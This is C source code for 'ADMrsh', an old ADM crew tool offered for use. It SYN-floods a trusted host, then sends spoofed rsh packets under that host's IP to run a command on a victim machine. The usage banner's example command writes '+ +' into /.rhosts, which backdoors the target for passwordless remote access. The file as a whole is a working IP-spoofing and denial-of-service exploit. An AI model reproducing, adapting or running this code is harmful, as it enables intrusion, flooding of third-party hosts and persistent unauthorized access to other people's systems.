/************************************************************************/ /* ADM RSH Sp00fer ver 0.5 (c) ADM */ /* */ /* The ADM CreW */ /* official ftp site: ftp.janova.org/pub/adm */ /* all credit going to: Heike my eternal lov =) , ADM Crew, !w00w00 */ /************************************************************************/ #include "ADM-spoof.c" #define NUMBASYN 20 #define ERROR -1 #define VERSION "0.5 pub" int Rcheckport(u_int d_ip) { int i; int port[18]={512,513,514,515,520,526,530,531,532,540,543,544,556,600,749,750,751,754}; for(i=0;i<18;i++){ if( pprobe(d_ip,port[i],TH_SYN) == 0 ) return(port[i]); } return(ERROR); } unsigned long host2ip(char *serv) { struct sockaddr_in sinn; struct hostent *hent; hent=gethostbyname(serv); if(hent == NULL) return 0; bzero((char *)&sinn, sizeof(sinn)); bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length); return sinn.sin_addr.s_addr; } void main(int argc, char **argv) { unsigned long s_ip; unsigned long d_ip; unsigned long da_ip; int s, s_r; int i=1; char *cmdptr; u_int sport; unsigned int DAPORT=514; char cmd[512]; if(argc<2){ system("clear"); printf("\n\n\n\n\n\n\n\n\n\t\t\t =============================\n"); printf("\t\t\t = $$$ $$$$$$ $$ $$ =\n"); printf("\t\t\t == $$ $$ $$ $$ $$$ $$$ ==\n"); printf("\t\t\t=== $$$$$$$ $$ $$ $$ $ $$ ===\n"); printf("\t\t\t == $$ $$ $$ $$ $$ $$ ==\n"); printf("\t\t\t = $$ $$ $$$$$$ $$ $$ =\n"); printf("\t\t\t =============================\n"); printf("\t\t\t RoX The NeTw0rk\n"); sleep(1); system("clear"); printf(" ADMrsh\n"); printf(" **==**\n\n"); printf(" It's very easy to use (like all the ADM products).\n\n"); printf(" ADMrsh [ips] [ipd] [ipl] [luser] [ruser] [cmd] \n\n"); printf(" Parameters List : \n"); printf(" ips = ip source (ip of the trusted host)\n"); printf(" ipd = ip destination (ip of the victim)\n"); printf(" ipl = ip local (your ip to receive the informations)\n"); printf(" luser = local user\n"); printf(" ruser = remote user\n"); printf(" cmd = command to execute\n\n"); printf(" If ya don't understand, this is an example :\n\n"); printf(" ADMrsh a.foo.us b.foo.us ppp.bad.org root root \"echo\\\"+ +\\\">/.rhosts\"\n\n"); printf(" Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet \n"); printf(" ADMrsh %s (c) ADM <-- hehe ;) \n",VERSION); exit(0); } memset(cmd,0,512); if( (s_r=socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == ERROR){ perror("socket"); exit(ERROR); } if( (s=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERROR){ perror("socket"); } #ifdef IP_HDRINCL if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i)) < 0) { fprintf(stderr, "cant set IP_HDRINCL\n"); close(s); exit(0); } #endif printf("open socket...\n"); d_ip = host2ip(argv[2]); s_ip = host2ip(argv[1]); myip.ip = da_ip = host2ip(argv[3]); printf("make port prob of the trusted host...\n"); sport=Rcheckport(s_ip); if(sport == ERROR){ printf("argh no port open ... he seem to be hard... :/ take a random sport\n"); sport = 513; } else{ printf("ok we have found a the port %i open \n",sport); } printf("let's play synfl00d\n"); ADMsyn(s_ip ,sport,NUMBASYN); printf("synflood finish..\n"); printf("make packet...\n"); cmdptr=cmd; strcat(cmdptr,"0\0"); cmdptr=cmdptr+2; strcat(cmdptr,argv[4]); cmdptr=cmdptr+strlen(argv[4])+1; strcat(cmdptr,argv[5]); cmdptr=cmdptr+strlen(argv[5])+1; strcat(cmdptr,argv[6]); cmdptr=cmdptr+strlen(argv[6])+1; printf("GO!\n"); if( Sconnect(s,s_ip,d_ip,sport,DAPORT,da_ip) == ERROR ) { printf("your connexion iz too slow !\n"); printf("try again ...\n"); printf("Tested on: SunOs 4.1.* ,FreeBSD,HP-UX\n,DEC"); printf("have fun ;)\n"); exit(0); } Swrite(s,cmd,strlen(argv[4])+strlen(argv[5])+strlen(argv[6])+2+3); printf("spoof sent..\n"); Srst(s); printf("reset connection...\n"); }